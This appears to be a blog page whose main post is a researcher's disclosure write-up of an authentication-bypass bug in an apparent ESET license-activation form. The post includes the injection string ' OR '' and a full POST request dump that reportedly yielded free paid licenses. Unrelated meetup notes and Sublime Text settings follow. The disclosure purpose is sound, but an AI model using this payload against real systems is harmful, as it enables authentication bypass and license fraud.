A Hilarious ESET Broken Authentication Vulnerability (one click free purchase)

eset-nod32-antivirus-banner

Hello Geeks and Security Evangelists,

My name is Mohamed Abdelbaset Elnoby, Just another Senior Information Security Researcher and Web Application Pentester in the world 😀 , Today I would like to show you a “hilarious” Broken Authentication bug I found in ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of  “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free.
(Yes “hilarious” is in bold, it’s not a formatting mistake but you will know why at the end of the story)

 

What is Broken Authentication?!

While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the log in page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.

In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.

Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:

  • In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.
  • In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.
  • In the application deployment phase, there may be issues during the application setup (installation and configuration activities) due to a lack in required technical skills or due to the lack of good documentation.

 

Black Box testing:

There are several methods of bypassing the authentication schema that is used by a web application:

  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection

 

 

Here’s in-depth details:

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

 

 

Result!!

Each time you send the above request with the bypass string, guess what?! you will receive a free paid license of ESET Nod32 valid for 1 Year!! (Actually the yearly subscription costs a $29.00 per user/request)
@SymbianSyMoh_2015.05.11_09h28m05s_013_

 

[*] Proof of Concept Video:

 

What to do?!

All what i need to do is to create a detailed report and address this “catastrophic” bug under their Responsible Disclosure rules and already did, but what is the previously mentioned “hilarious” thing here?!! :v

[*] Screenshots are louder than speech 😀

#1
@SymbianSyMoh_2015.05.11_07h29m27s_011_

#2
@SymbianSyMoh_2015.05.11_07h30m06s_012_

Behind the Scene!!

As this is a black-box testing and there is nothing interested printed out as an output, I can’t even predict what was happening in the back-end but it’s a good thing at least for a bug hunter 😀 assuming that this is maybe a Full Blind SQL Injection, an authentication bypass or even a broken authentication issue (the last one is more realistic one) but what I’m sure of is that in a parallel world there is a programmer having much of beer while handling the “If statement checks, input filtration and database querying” and he got drunk enough to be trapped into my bypass.

 

[*] Nothing to be said here but rules is rules and must be respected, Thanks Daniel but i will keep my sense of humor for my CV 😀

Conclusion…

For my dear programmers friends, Don’t trust user supplied inputs “filter all the things”, Stored procedures are safer, RTFM and finally don’t drink beer while coding, Peace. 😀

[**Update**]

ESET accused my report as an invalid report “after being accepted and rewarded #badass_logic” as this reported backend “eu-eset.com” is a phishing website.

The below screenshot reflects how confusion that ESET’s experts are suffering from during the report.

So if that’s really true and let’s argue on that this is true, Then:
1. Kudos to me that I have discovered a vulnerability in a website was built by a people was a good in “something” arguably “phishing” and still kick ESET’s ass by generating a valid Licenses.
2. More shame on ESET, they were being fucked by this “phishing website” till the moment I reported them because that “phishing website” is generating “by my bypass” an actual paid valid license of their “award-winning product” for free, Here’s another proof on what I’m saying here:


Have a good day, Gentlemen

References:

Broken_Authentication_and_Session_Management
Top_10_2013-A2-Broken_Authentication_and_Session_Management
Testing_for_Bypassing_Authentication_Schema

Contact me at:

Facebook
Twitter
LinkedIn

اللقاء الأسبوعي مع نائب نقابة المبرمجين المصريين

Today we had the honor to talk with the representatives of the Egyptian programmers union and we had a very interesting discussion about the challenges and the benefits for the developers like Retirements plan, Privacy, how to encourage investments in the IT in Egypt, How to secure the programmer career and much more…

 

 

for more information: https://www.facebook.com/groups/egyptian.geeks/

Programming and Development for non-tech people

We are talking today on a very important subject how to become a programmer for non technical people in Egypt.

My Sublime text 2 User Settings

Here I’m Sharing My Sublime text 2 User Settings. Because Sublime Text 2 is now one of the Most popular IDE’s After VIM for Ruby/Javascript Developers and it’s getting awesome everyday and the amount of unlimited helpful plugins makes it very flexible.

Sublime Text 2 User Settings

{
	"auto_complete_commit_on_tab": true,
	"color_scheme": "Packages/Theme - Flatland/Flatland Monokai.tmTheme",
	"detect_indentation": true,
	"draw_indent_guides": true,
	"draw_white_space": "all",
	"file_exclude_patterns":
	[
		".DS_Store"
	],
	"find_selected_text": true,
	"flatland_square_tabs": true,
	"folder_exclude_patterns":
	[
		".git",
		".bundle",
		".rbx"
	],
	"font_face": "Inconsolata",
	"font_options":
	[
		"directwrite"
	],
	"font_size": 10,
	"highlight_line": true,
	"ignored_packages":
	[
	],
	"new_window_settings":
	{
		"hide_open_files": true,
		"show_minimap": true,
		"show_tabs": true,
		"side_bar_visible": true,
		"status_bar_visible": true
	},
	"tab_size": 2,
	"theme": "Flatland Dark.sublime-theme",
	"translate_tabs_to_spaces": true,
	"trim_trailing_white_space_on_save": true,
	"use_simple_full_screen": true,
	"vintage_start_in_command_mode": true,
	"word_wrap": true
}

Sublime text 2 User Settings Screenshot

Please try it and share your with us.

Cloud Computing

In this week’s meeting we are discussing the Cloud Computing platforms, the pros & cons and the challenges that faces developers when they are developing Cloud Computing Systems.

Discussing All the Cloud Computing Services Like Amazon S3 and Rackspace.

How to be a Professional Developer

In this weekly hangout we are discussing the process on how to be a professional developer and The difference between coding in your university and coding in the real world.

This Video is targeted mainly to Computer Science Students in Egypt and how to prepare your professional Career.

02 – Software Estimation

This week we are discussing the Software Estimation Issue and How to minimize the risk that you can face in the process of making your Time Estimation.

01 – Prototyping

Our First Egyptian Geeks Online Meeting we were talking about Prototyping and We were testing our presence and Initiating our Weekly Hangout/Meeting and Workshops.